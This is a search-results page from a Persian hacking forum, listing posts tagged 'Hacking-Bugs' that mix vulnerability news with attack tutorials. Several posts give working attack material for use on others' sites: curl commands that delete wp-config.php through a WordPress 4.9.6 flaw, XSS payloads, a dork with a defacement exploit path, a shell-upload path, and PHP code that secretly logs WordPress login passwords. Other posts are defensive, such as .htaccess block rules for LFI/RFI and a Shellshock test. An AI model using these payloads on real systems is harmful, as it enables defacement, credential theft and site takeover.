امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Hacking-Bugs'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

76 نتیجه پیدا شد

  1. rezasarwary

    Hacking-Bugs

    سلام من یک سایت رو پیدا کردم که باگ xss داره و چند مرحله رو رفتم ولی میخوام که محتوای یه خط از سایت رو تغیر بدم نمیشه شاید کدم مشکل داشته باشه یکی کمکم کنه. کد:::::: "/><script>document.getElementByClassName('head').innerHTML="HI ADMIN"</script>
  2. Rednofozi

    Hacking-Bugs

    قوانین تاپیک اسپم مننوع سوال بی جا ممنوع در بخش پرس پاسخ سوال کنید این تاپیک فقط دستوراتی که باگ رو باهاش میشه شناسایی کرد اموزش دهنده inj3ct0r Rednofozi ReZa CLONER Moeein Seven
  3. پژوهشگران امنیتی ThreatPress آسیب‌پذیری‌هایی را در ده افزونه مختلف وردپرس کشف کرده‌اند که توسط یک شرکت برای وب‌سایت‌های فروشگاهی تحت پلتفرم woocommerce ساخته شده‌اند. این شرکت که Multidots نام دارد، افزونه‌هایی را ارائه کرده است که از سایت رسمی وردپرس (wordpress.org) قابل دریافت هستند. این افزونه‌ها قابلیت‌های مختلفی را برای کاربران وب‌سایت‌های فروشگاهی فراهم می‌کنند. افزونه‌ها حدود ۲۰۰۰۰ نصب فعال دارند که شامل ۱۰۰۰۰ نصب برای افزونه Page Visit Counter، ۳۰۰۰ نصب برای افزونه WooCommerce Category Banner Management و ۲۰۰۰ نصب برای افزونه WooCommerce Checkout for Digital Goods می‌باشند. این پلاگین‌ها در قبال تزریق اسکریپت از طریق وب‌گاه (XSS)، جعل درخواست میان وب‌گاهی (CSRF) و تزریق SQL آسیب‌پذیر هستند. مهاجمین می‌توانند از این آسیب‌پذیری‌ها استفاده کنند تا حملات deface، اجرای Shell از راه دور، قرار دادن keylogger و نصب کاوشگر ارز دیجیتالی را انجام دهند. همچنین مهاجمین می‌توانند به اطلاعات وب‌سایت شامل اطلاعات فردی و مالی کاربران دسترسی پیدا کنند. آسیب‌پذیری به مهاجم احرازهویت نشده اجازه می‌دهد تا کد جاوااسکریپت مخرب را تزریق کند و اطلاعات کارت‌های اعتباری کاربران سایت و اطلاعات ورود مدیران سایت را برباید. بدلیل عدم پاسخگویی شرکت سازنده این افزونه‌ها، وردپرس تصمیم به غیرفعال‌سازی افزونه‌های تحت تاثیر گرفته است. ۴ شناسه CVE به این آسیب‌پذیری‌ها تخصیص یافته است که شامل موارد CVE-۲۰۱۸-۱۱۵۷۹، CVE-۲۰۱۸-۱۱۵۸۰، CVE-۲۰۱۸-۱۱۶۳۳ و CVE-۲۰۱۸-۱۱۶۳۲ هستند. ThreatPress می‌گوید که انتظار می‌رود شناسه‌های بیشتری نیز تخصیص یابند. جزئیات فنی و کد اثبات مفهومی (PoC) این آسیب‌پذیری‌ها نیز از طرف ThreatPress منتشر شده‌اند.
  4. مرکز مدیریت امداد و هماهنگی عملیات رخدادهای رایانه ای نسبت به آسیب پذیری جدید زبان PHP که سیستم مدیریت محتوای «وردپرس» را هدف قرار داده است، هشدار داد. به گزارش مرکز ماهر، محقق امنیت سایبری مرکز Secarma ، به تازگی یک ‫آسیب پذیری بر روی زبان PHP منتشر کرده که بخش Installations سیستم مدیریت محتوای سایت وردپرس ( Wordpress ) را آسیب پذیر خواهد کرد. بر اساس گزارش منتشره، این آسیب پذیری که از نوع Code Execution بوده در تاریخ ۲۸ فوریه ۲۰۱۷ به تیم امنیتی وردپرس گزارش شده، اما تا به امروز این آسیب پذیری رفع نشده است. این آسیب پذیری تنها سیستم مدیریت محتوا Wordpress را هدف نمی گیرد، چراکه آسیب پذیری در زبان برنامه نویسی PHP بوده و تمامی اپلیکیشن های مبتنی بر پی اچ پی ( PHP-based ) را تحت تأثیر خود قرار خواهد داد. این آسیب پذیری در ساختار Deserialization زبان برنامه نویسی PHP وجود دارد که همان عملکرد بازگرداندن String ها به PHP Object ها بوده و از سال ۲۰۰۹ که اولین بار محقق امنیت سایبری آلمانی به نام Stefan Esser حمله موفقیت آمیز به ساختار Deserialization را منتشر کرد، بارها آسیب پذیری های مشابه و Exploit های آنها توسط روش های مختلف منتشر شده که باعث حملات مختلف علیه سرورها و اپلیکیشن PHP ها شده است. آسیب پذیری جدید منتشر شده باعث می شود که نفوذگر بتواند داده های مد نظر خود را روی سرور قربانی آپلود کند. این خود باعث می شود که راهی برای فراخوانی phar:// را برای نفوذگر فراهم کند در نهایت امکان اجرای کدهای آلوده روی سرور قابل انجام خواهد بود. این آسیب پذیری روی پروسه عملکرد توابع thumbnail در سیستم مدیریت محتوا Wordpress اثر می گذارد و در صورت آپلود فایلهای عکس آلوده روی سرور مدنظر، امکان Exploit کردن این آسیب پذیری برای نفوذگر فراهم می شود. در تحقیقات اولیه علاوه بر وردپرس، سیستم مدیریت محتوا Typo۳ و Contao هم دارای این آسیب پذیری هستند. برای انجام این حمله به وردپرس، دو فایل متفاوت Payload ، یکی برای نسخه ۴.۹ و دیگری برای نسخه های پایین تر باید آماده شود. برخلاف وردپرس که تا این لحظه به روز رسانی برای رفع آسیب پذری فوق ارائه نکرده است، تیم پشتیبانی Typo۳ در آخرین به روزرسانی خود این آسیب پذیری را رفع کرده است. این آسیب پذیری در هفته گذشته در دو کنفرانس BlackHat و BSides معرفی شده است. همچنین روی کتابخانه TCPDF هم وجود دارد که برای کار کردن با فایلهای PDF در زبان PHP است. مرکز ماهر از کاربران خواست که برای جلوگیری از حمله علیه این CMS ها و کتابخانه های مشابه، به روزرسانی هایی که در چند روز آینده ارائه خواهند شد را حتما روی سامانه های خود اعمال کنند. وردپرس یک سیستم مدیریت محتوا برای سایت‌ها و وبلاگ‌ها است. به بیان دیگر وردپرس یک سیستم رایگان وبلاگ نویسی است که به صورت یک CMS یا نرم‌افزار متن باز برای مدیریت محتوای سایت‌ها معرفی شده است.
  5. اکسپلویت وردپرس ۴٫۹٫۶ توضیحات درباره وردپرس و اکسپلویت وردپرس وردپرس یک سیستم مدیرت محتوا بسیار محبوب و پر استفاده در دنیای اینترنت میباشد که این امکان را میدهد در کمتر از ۵ دقیقه وبلاگ خود را راه اندازی کنید به همین دلیل کاربران بسیاری را به سمت خود جذب کرده است و حجم زیادی از سایت های دنیا بر پایه این سیستم مدریت محتوا میباشند در این پست اموزشی حفره امنیتی جدید وردپرس را معرفی میکنیم و توضیحات کاملی درباره ان خواهیم داد اکسپلویت وردپرس در نسخه جدید وردپرس ورژن 4.9.6 اسب پذیری مهمی کشف شد و داخل سایت های ثبت اکسپلویت ان را مشاهده میکنیم این اسیب پذیری این امکان را به نفوذگر میدهد که فایل های درون دایرکتوری سرور را حذف نماید که این میتواند مشکلات بسیاری را رقم بزند به طور مثال فایل config وردپرس یکی از مهم ترین فایل های ان میباشد که درصورتی که حذف شود امکان ریست وردپرس به شخص داده میشود و میتوانید سیستم را از نو با پسود جدید راه اندازی کند نحوه استفاده و اموزش هک این باگ در برگه post.php وردپرس و ورودی thumb که برای ادرس فایل ها میباشد کشف شده است و هک وردپرس و راه های امنیت پس برای استفاده از اکسپلویت وردپرس به صورت دستی ان باید یک دسترسی سطح پایین داشت مانند نویسنده در قسمت رسانه ها یک تصویر جدید اپلود میکنیم و در قسمت تغیرات وارد میشویم در اینجا وارد لینوکس خود شوید و دقت کنید سرویس curl نصب باشد بعد از ان همانند دستور زیر فایل مورد نظر خود را حذف کنید curl -v 'http://site.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ادرس سایت مورد نظر خود را در قسمت site وارد کنید و در اخر هم صحفه مورد نظر مانند Config.php را میتوانید برای حذف انتخاب کنید حال صفجه مورد نظر انتخاب شده است و برای حذف ان مانند دستور زیر انجام میدهیم curl -v 'http://site.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' بعد از اجرای دستور بالا اکسپلویت شما با موفقیت عمل میکنید
  6. Rednofozi

    Hacking-Bugs

    توضیحات مرورگر تور یکی از امن ترین مرورگر ها برای جستجو میباشد که در اموزش قبلی دارک وب با استفاده از این مرورگر وارد این شبکه شدیم اما مدتی است که یکی از افزونه هایی که بصورت دیفالت در ان نصب است دچار حفره امنیتی خطرناکی شده است افزونه NoScript که شامل این اسیب پذیری است نقش محمی برای شناسایی نشدن در دنیای اینترنت را داشت و همچنین در مرورگر فایرفاکس میتوانید از ان استفاده کنید از ان جایی که مرورگر تور برپایه فایرفاکس است در ان وجود دارد و نقش افزونه مرورگر NoScript جلوگیری از اجرای اسکریپت ها مانند JavaScript, Flash و Java در وب سایت های مختلف میباشد اما با باگ ۰day که در ان پیدا شده است این امکان فراهم شده که اسکریپت را حتی با فعال بودن افزونه بر روی کلاینت اجرا کند که این میتواند خطر های امنیتی بسیاری داشته باشند مانند ردیابی کلاینت و … امنیت در افزونه مرورگر NoScript TOR به راحتی یک وبسایت میتواند با استفاده از این باگ صفر روزه ای پی شخص را بدست اورد و این اسیب پذیری در نسخه های 5.0.4 تا ۵٫۱٫۸٫۶ وجود دارد در نسخه جدید Tor 8 شاهد طراحی جدید در Api های ان هستیم و این اسیب پذیری به طور کامل رفع شده است پیشنهاد میشود برای حفظ امنیت خود هرچه سریع تر مرورگر Tor خود را به اخرین نسخه اپدیت کنید ابزار sublist3r جدید برای جمع اوری اطلاعات و درصورتی که در مرورگر خود اپدیتی برای افزونه دریافت کردین ان را به همراه هسته مرورگر بروزرسانی کنید برای برسی اپدیت های افزونه NoScript به لینک زیر وارد شوید NoScript - JavaScript/Java/Flash blocker for a safer Firefox experience! - get it! - InformAction
  7. به نام خدا با سلام خدمت دوستان امروز در این اموزش بهتون نحوه دریافت CVE رو یاد میدیم /. گام اول : CVE چیست !؟ CVE یا همون Common Vulnerabilities and Exposures یه سیستم جامع و پیشرفته ثبت باگ استفاده میشه که توسط MITRE اداره میشه /. MITRE یا MITRE.ORG وظیفه دریافت کد مخفف متناسب با اسیب پذیری بهتون میده که براش ارسال میکنید . ( بطور کلی کلاس کاری خوبی به اکسپلویت شما میده ) نحوه دریافت CVE برای اسیب پذیری ها شما برای دریافت کد از MITRE باید یه سری توضیحات کامل از اسیب پذیری ( هر اسیب پذیری باشه تحت وب , نرم افزاری , سیستمی ) به ایمیل cve-assign@mitre.org ارسال کنید . به طور مثال / فرض می کنیم که من از یک نرم افزار ۶ باگ Buffer Overflow و ۲ باگ Format String پیدا کردم. این ۸ باگ رو با مکاتبه با این سیستم ارائه می دم. اگر باگ ها خیلی خاص و تأثیر گذار نباشن ۲ CVE به من داده میشه. یکی برای Format String ها و یکی هم برای Buffer Overflow ها به این عمل CVE-Merging هم گفته میشه به این صورت تمام اون هایی که از یک نوع هستن اگر نیاز نباشه در یک CVE لحاظ میشن. بسیار خوب حالا من 2 کد CVE دارم که به راحتی می تونم این issue ها رو هر جایی که لازم باشه عنوان کنم. فرضاً اکسپلویتی برای این مورد نوشتم دیگه نیازی نیست توضیح خیلی زیادی بدم فقط میام و این CVE رو در اکسپلویتم قرار می دم کافیه فردی که می خواد اطلاعاتی در مورد این باگ داشته باشه کد رو سرچ کنه توی دیتابیس MITRE یا جاهای دیگه که ثبت میشه و اطلاعات رو به دست بیاره. ممکنه vendor بخواد فیکس کنه این موارد رو که به راحتی تو توضیحات فیکس می نویسه مثلاً طبق فلان CVE این فیکس انجام شده. به این صورت میبینیم که ردگیری حفره ها بسیار ساده میشه. اما نکته هایی رو باید عرض کنم. مورد اول اینکه این کد با اینکه عمومیت داره اما معمولاً برای هر آسیب پذیری استفاده نمیشه. سعی کنید اگر می خواید این پروسه رو انجام بدید باگ هایی رو برای این موارد بفرستید که سیستم هدفتون معروف باشه. مثلاً یک CMS که برا نمی دونم ۴ تا سایت چینی هست و یک باگ داره نیازی به این کد آنچنان نداره چون نه فیکسی براش ممکنه انجام بشه و نه اینکه کارایی خاصی داشته باشه. اما نرم افزار های سیستمی یا کاربردی که در سیستم عامل ها وجود دارن عموما قادر به دریافت یک CVE هستن. مورد دوم اینکه ممکنه به ظاهر این تنها برای اعلان یک آسیب پذیری استفاده بشه اما استفاده عمده ای که از CVE میشه در فیکس ها هستش. آسیب پذیری ها طبقه بندی میشن و پروسه اصلاح یک نرم افزار به خوبی انجام میشه. مورد سوم در این باره هستش که بعضی از شرکت ها بر اساس قراردادی که با MITRE دارن بلاک هایی از این کد رو رزرو می کنن و برای خودشون استفاده می کنن. فرضاً شرکت RED HAT بلاک های ۵۰۰ تایی رو عموما دریافت می کنه و برای موارد بسیاری استفاده میکنه. در مورد نرم*افزار ها و کد های اوپن سورس هم می تونید از میل لیست oss-security استفاده کنید. این میل لیست توسط شرکت RED HAT هم کنترل میشه به همین خاطر در حال حاضر فردی به نام Kurt Seifried الان به درخواست هایی که به صورت [CVE Request] ارسال بشن CVE تخصیص میده. اطلاعات دیتابیس MITRE ممکن هست که همون موقع آپدیت نشه ( به دلیل حجم بالای درخواست ها ) که اگر CVE گرفته باشید محتوی اون CVE با Reserved پر خواهد شد. میل لیست oss-security از آدرس زیر قابل دسترسی هست و می تونید ثبت نام کنید oss-security mailing list ( ربرای دریافت CVE این پروسه توسط تیم انجام میشه اسیب پذیری ها رو به ایمیل تیمRednofozi@yahoo.com فرستید . ) تیم ثبت اسیب پذیری تیم Rednofozi
  8. Rednofozi

    Hacking-Bugs

    محقق امنیتی استفان چازیلاس، آسیب*پذیری بحرانی را در نرم*افزار Bash، کشف کرده است که پیرامون نحوه*ی عمل*کرد متغیرهای محیطی می*باشد. این آسیب*پذیری با شناسه*ی CVE-2014-6271 معرفی شده است و در تمام توزیع*های لینوکس از جمله توزیع دبیان وجود دارد و به*گفته*ی کارشناسان امنیتی این آسیب*پذیری به*اندازه*ی آسیب*پذیری Heartbleed مهم و پرخطر است و می*تواند تاثیر بسیار شگفتی در دنیای اینترنت داشته باشد. bash مخفف عبارت Bourne again shell ابزاری شبیه به شِل در سامانه*های یونیکسی است که احتمالاً محبوب*ترین ابزار کاربران لینوکس نیز می*باشد. در سامانه*عامل*های لینوکسی، متغیر*های محیطی راهی را برای تاثیر*گذاری در رفتار یک نرم*افزار ایجاد می*کنند، این متغیر*ها معمولاً دارای یک نام و یک مقدار منتسب به نام هستند. در سامانه*عامل لینوکس، غالب نرم*افزار*ها در هنگام اجرا یک نسخه از بَش را در پشت صحنه اجرا می*کنند و از آن برای ارتباط با یک کاربر راه دور استفاده می*کنند. آسیب*پذیری موجود در بَش به این مسئله مربوط است که متغیر*های محیطی می*توانند با مقادیر اولیه*ی مخربی قبل از صدا زدن نرم*افزار بَش ایجاد شوند. این متغیر*ها می*توانند به جای مقادیر مجاز شامل کد باشند که به محض اجرای بَش این کد نیز اجرا می*شود. نام متغیر محیطی که حاوی کد است مهم نیست و تنها محتوا و یا مقدار این متغیر است که می*تواند مخرب باشد و به همین دلیل این آسیب*پذیری می*تواند در بسیاری از نرم*افزار*ها تاثیرگذار باشد، در ادامه برخی نرم*افزار*های مهم بررسی شده است*: ForceCommand: ابزاری برای پیکربندی sshd به منظور ایجاد قابلیت*های اجرای محدودشده*ی فرمان برای کاربران راه دور است. آسیب*پذیری تازه *کشف*شده می*تواند محدودیت اجرای فرمان را دور بزند و امکان اجرای هر فرمانی را فراهم کند. بسیاری از مخزن*های نرم*افزاری Git و Subversion از یک شِل با این پیکربندی استفاده می*کنند. البته استفاده*ی معمولی از OpenSSH امکان سوء*استفاده از این آسیب*پذیری را برای مهاجم باز نمی*کند، چراکه در این حالت کاربر امکان اجرای همه*ی فرمان*ها را دارد. کارگزار*های Apache: در صورتی که این کارگزارها با از mod_cgi و mod_cgid استفاده کنند در مقابل این آسیب*پذیری مصون نیستند، اسکریپت*های CGI معمولاً یا در بَش توسعه پیدا کرده*اند و یا یک شِل جدید برای اجرا باز می*کنند. اسکریپت*های PHP: این اسکریپت*ها با متغیر mpd_php حتی اگر برای اجرا یک شِل جدید باز کنند منجر به سوء*استفاده از این آسیب*پذیری نخواهند شد. سرویس*گیرندگان DHCP: این سرویس*گیرندگان برای پیکربندی سامانه باید یک اسکریپت شِل را اجرا کنند که متغیر*های آن می*تواند از یک کارگزار که به صورت بالقوه آلوده شده است گرفته شود. که در نهایت منجر به اجرای فرمان*های مخرب در ماشین سرویس*گیرنده می*شود. مانند همه*ی زبان*های برنامه*نویسی، بَش نیز دارای توابع است، اگرچه در بسیاری از مواقع کارایی این توابع به اندازه*ی زبان*های برنامه*نویسی سطح بالا نیست، ولی به*هرحال این احتمال وجود دارد که یک تابع به عنوان مقدار متغیر محیطی درج شود. تعریف یک تابع به عنوان متغیر محیطی زمانی امکان*پذیر است که کد اضافی در انتهای تعریف تابع افزوده شود، مانند مثال زیر: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"vulnerablethis is a test برای رفع چنین آسیب*پذیری لازم است توسعه*دهندگان در نرم*افزار*های خود این تضمین را ایجاد کنند که امکان افزودن کد اضافی در انتهای تابع وجود ندارد، بنابراین اگر کد مخرب بالا در یک بَش وصله*شده اجرا شود، خروجی مانند مثال زیر خواهد بود : $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"bash: warning: x: ignoring function definition attemptbash: error importing function definition for `x'this is a test
  9. Rednofozi

    Hacking-Bugs

    CSRF مخفف عبارت Cross Site Request Forgery میباشد که در اطلاح و عمل به معنای عبور از درخواست های سایت و ارسال درخواست های جعلی به آن است. فرض کنید در پنل کاربری سایت شما ، صفحه ای مربوط به تغییر نام کاربری و کلمه عبور میباشد ، شما با وارد کردن رمز عبور و تکرار آن میوانید به سرعت رمز عبور خود را تغییر دهید ، اما در پشت پرده درخواست شما به سرور ارسال میشود و سرور با استفاده از کوکی های ارسالی توسط مرورگر و بررسی صحت آن ، درخواست شما را میپذیرد و رمز عبورتان تغییر میابد ، بنابر این اگر این درخواست از سوی شخص دیگری ارسال گردد از آنجایی که کوکی های ارسالی بی اعتبار است درخواست مربوطه توسط سرور رد میشود. حال اگر این درخواست بدون آنکه متوجه شوید از سوی شما ارسال گردد چه اتفاقی رخ خواهد داد؟ با استفاده از روش های موجود در زبان های Client Side میتوان صفحه ای طراحی کرد که با ورود به آن کوکیه شما که مربوط به سایت جاری است ، در داخل یک فرم قرار گیرد و بدون آنکه متوجه شوید و به صورت کاملا اتوماتیک فرم مذکور submit گردد و درواقع درخواستی از طرف شما به سوی سرور ارسال شود که این درخواست میتواند شامل تغییر رمز عبور باشد. سناریوی توضیح داده شده را به اختصار CSRF مینامند. برای جلوگیری از CSRF میتوان از Captcha در صفحات حساس مانند مثال بالا استفاده نمود و تا زمانی که کاربر عبارت امنیتی را بصورت صحیح وارد ننماید ، درخواستش از طرف سرور مورد بررسی قرار نخواهد گرفت.
  10. M.R.X

    Hacking-Bugs

    با سلام واستون آموزش لایک بی نهایت اینستاگرام رو گذاشتم امیدوارم خوشتون بیاد 1اول میرید توی سایت leetgram 2 ثبت نام میکنید 3چند گزینه براتون نمایش داده میشه autolikerرئ انتخاب کنید آدرس پست رو کپی کنید یا اگه با اکانت خودتون وارد شدید پست هاتون نمایش داده میشه 4محدودیت وجود دارد و برای هر پست 300لایک در 15 دقیقه میتوانید بزنید امیدوارم آموزش خوب باشد
  11. Rednofozi

    Hacking-Bugs

    # Dork: intitle:Priv8 SCR Exploit: http://localhost/config/config.izo Write Your Deface Hacked By .... and clic "Hajar" If Done Check deface : http://localhost/config/tar.tmp
  12. جلوگيري از حملات lfi و rfi با اضافه کردن کد زیر به فایل htaccess سایتتون میتونید تا حدودی جلوی این ۲ باگ رو بگیرید. توجه داشته باشید این کد توی بعضی سرور ها جواب نمیده RewriteCond %{REQUEST_METHOD} GET RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http%3A%2F%2F [OR] RewriteCond %{QUERY_STRING} proc\/self\/environ [NC,OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC] RewriteRule .* - [F] RewriteCond %{QUERY_STRING} (%2F..|..%2F|/..|../|%00|etc|passwd|proc) [NC] RewriteRule .* - [F] منبع anonysec
  13. Rednofozi

    Hacking-Bugs

    که به نفوذگر اجازه اپلود فایل مخرب رو به راحتی میده که باعث در دست گرفتن کل سایت میشه و راحت سایت مورد نفوذ و هک قرار میگیره اسیب پذیری از نوع Rce هست که بدون دسترسی از سایت امکان اپلود شلر رو به هکر میده +site+"/wp-content/uploads/wpallimport/uploads/"+up_dir+"/evil.php" منبع anonysec
  14. Rednofozi

    Hacking-Bugs

    عزیزی که قالب وردپرس رو فارسی سازی میکنن میان توی قالب بکدور میزارن تا بعد نصب پوسته توسط کاربران میان دسترسی میگیرن از سایت با همون بک دوری که کار گذاشتن سایت رو مورد نفوذ قرار میدن و اسمشون رو میزارن هکر ! پوسته های الوده به بک دور وردپرس که توی چند ساعت برسی پیدا کردم به صورت زیر هست storyone mypress iranicars livefarsi themefi choob1 gamerfa carwp newsdl Shoppingwp مدارک برای اثبات حرف. توی این پوسته ها فایل هایی به اسم زیر وجود داره که انکد شده و سورسش رو مخفی کردن تا کسی سر در نیاره ازشون. 14301603.php 16670530.php 48773954.php 89255827.php 30436399.php 68097533.php 59363402.php لینک اسکن توسط انتی ویروس های معروف از فایل الوده که بعد از دیکد انالیز شده https://www.metascan-online.com/en/scanresult/file/099d3915c6ca4bb5b266d0355f361feb فایل که توش کد زیر رو مشاهده کنید. $auth_pass = "a23943a5edc56f796ea1aeeb57f78dd4"; منبع anonysec
  15. Rednofozi

    Hacking-Bugs

    اگر واسه دانلود فایلی توی گوگل سرچی کرده باشید متوجه میشید که بعضی از سایت ها از صفحه ای واسه دانلود کردن فایل به وسیله کاربر استفاده میکنند به طور مثال http://anonysec.org/download.php?file=hacking.pdf از ادرس بالا به شما اجازه دانلود فایل hacking.pdf رو میده از اونجایی که توی بیشتر موارد ورودی ها چک نمیشه و کاربر میتونه هر فایلی رو که بخواد دانلود کنه موجب هک شدن سایت میشه. خوب چطور؟ وقتی که ورودی ها کنترل نشن و کاربر اجازه دانلود هر فایلی رو داشته باشه میتونه فایل های مهم از جمله کانفیگ وب سایت رو دانلود کنه و به صورت Remote به دیتابیس دسترسی پیدا کنه و با عوض کردن پسورد مدیر سایت از توی دیتابیس اقدام به هک کردن و تغییر چهره وب سایت کنه. hairline.it hairline.it منبع anonysec
  16. Rednofozi

    Hacking-Bugs

    مهاجم با ارسال کد جاوا اسکریپت در قسمت نظرات میتواند کنترل وب سایت وردپرسی را در دست بگیرد. با حفره Cross Site Script مهاجم می تواند رمز عبور مدیر را تغییر یا حساب کاربری جدیدی در سایت ایجاد کند و یا انجام هر چیز دیگری که مدیر در حال حاضر وارد شده می تواند بر روی سیستم هدف انجام دهد در حال حاضر وردپرس ورژن های 4.2, 4.1.2, 4.1.1, 3.9.3. تمامی آسیب پذیر میباشد. <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
  17. Rednofozi

    Hacking-Bugs

    معمولا کد های wp-login.php سایت وردپرس رو ویرایش میکنن و هر زمان که لوگین میکنیم پسورد جدید توی فایل txt ذخیره میشه یا ایمیل میشه واسه هکر. با اضافه کردن کد زیر به فایل wp-login.php <?php $handle = fopen("wp-admin/includes/error_log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); ?> پسورد ها در مسیر زیر ذخیره میشوند. wp-admin/includes/error_log.txt منبع anonysec
  18. Rednofozi

    Hacking-Bugs

    طبق گزارش exploit-db باگ جدیدی و خطرناکی در پلاگین vBSEO یافت شده همچنین تیم vBSEO چون دیگه از این پلاگین پشتیبانی نمیکنه نحوه فیکس این باگ توسط vbulletin.com ارائه شده برای فیکس این باگ به vbseo/includes در هاستتون برید و فایل functions_vbseo_hook.php رو باز کنید داخل functions_vbseo_hook.php دو خط کد زیر رو پیدا کنید if(isset($_REQUEST['ajax']) && isset($_SERVER['HTTP_REFERER'])) $permalinkurl = $_SERVER['HTTP_REFERER'].$permalinkurl; و با کد زیر جایگزین کنید // if(isset($_REQUEST['ajax']) && isset($_SERVER['HTTP_REFERER'])) // $permalinkurl = $_SERVER['HTTP_REFERER'].$permalinkurl; منبع:anonysec
  19. Rednofozi

    Hacking-Bugs

    تفاوت Encryption و Hashing در چیست ؟ بهم ریختن داده ها و اطلاعات یا Hashing به یک فرآیند یک طرفه هست که در آن هر نوع از داده های خروجی در نهایت تبدیل به یک رشته داده خروجی با یک اندازه ثابت می شود که به آن Hash Value یا مقدار تابع درهم سازی گفته می شود. شما نمی توانید از یک Hash Value داده خود را برداشت کنید زیرا این نوع الگوریتم ها کاملا یک طرفه هستند و بیشتر برای تسریع فرآیند جستجو و اطمینان از صحت داده ها در هنگام انتقال مورد استفاده قرار می گیرند. الگوریتم هایی مثل MD و SHA از انواع الگوریتم های درهم سازی یا Hashing هستند که بیشترین استفاده را دارند. رمزنگاری یا Encryption به تبدیل داده ها به قالبی گفته می شود که فقط برای کاربران مجاز قابل مشاهده باشد و هیچ کاربر غیرمجازی نتواند داده واقعی را مشاهده کند. به داده ای که رمزنگاری شده باشد در اصطلاح Cipher-Text گفته می شود ، اندازه داده ای که رمزنگاری می شود با حجم داده ورودی آن تا حدود زیادی یکسان است و شما می توانید از داده های رمزنگاری شده داده خود را خارج کنید که به این فرآیند رمزگشایی گفته می شود. الگوریتم های رمزنگاری بصورت کلی به دو دسته متقارن با یک کلید برای رمزنگاری و همان کلید برای رمزگشایی و نامتقارن که دارای دو کلید عمومی و خصوصی برای رمزنگاری و رمزگشایی می شوند تقسیم بندی می شود.
  20. Rednofozi

    Hacking-Bugs

    آسیب پذیری Sql Injection در WordPress 4.2.3 WordPress 4.2.3 and earlier SQL Injection Vulnerability روز گذشته آسیب پذیری جدید از وردپرس نسخه 4.2.3 توسط محقق امنیتی به نام ocean90 کشف و اکسپلویت شد آسیب پذیری جدید به گزارش وب سایت امنیتی cxsecurity در فولدر wp-includes وردپرس و فایل post.php ورژن 4.2.3 وردپرس میباشد. نفوذگر با استفاده از حملات Sql Injection میتواند اقدام به نفوذ به دیتابیس سایت وردپرسی کند و کنترل وب سایت را به دست بگیرد در هفته گذشته هم آسیب پذیری Cross Site Request Forgery در وردپرس 3.8.1, 3.8.2, و 4.2.2 کشف شد و تیم مدیریت وردپرس اقدام به ارائه ورژن 4.2.3 مدیریت محتوای وردپرس نمود که بعد از مدت کوتاهی آسیب پذیری Sql Injection به ثبت رسید. آسیب پذیری Sql Injection در ورژن 4.1 وردپرس همانند ورژن 4.2.3 در دیگر فایل های هسته وردپرس توسط محقیقین امنیتی کشف شد. در حال حاضر وردپرس اقدام به ارائه اپدیت جدید نکرده است و باید منتظر ارائه و دریافت نسخه جدید از وردپرس بود. با استفاده از آسیب پذیری Cross Site Request Forgery میتوان با ارسال دستورات html در قسمت دیدگاه های وردپرس اقدام به اجرای دستورات جعلی نمود و مدیریت سایت وردپرسی را در دست گرفت
  21. Rednofozi

    Hacking-Bugs

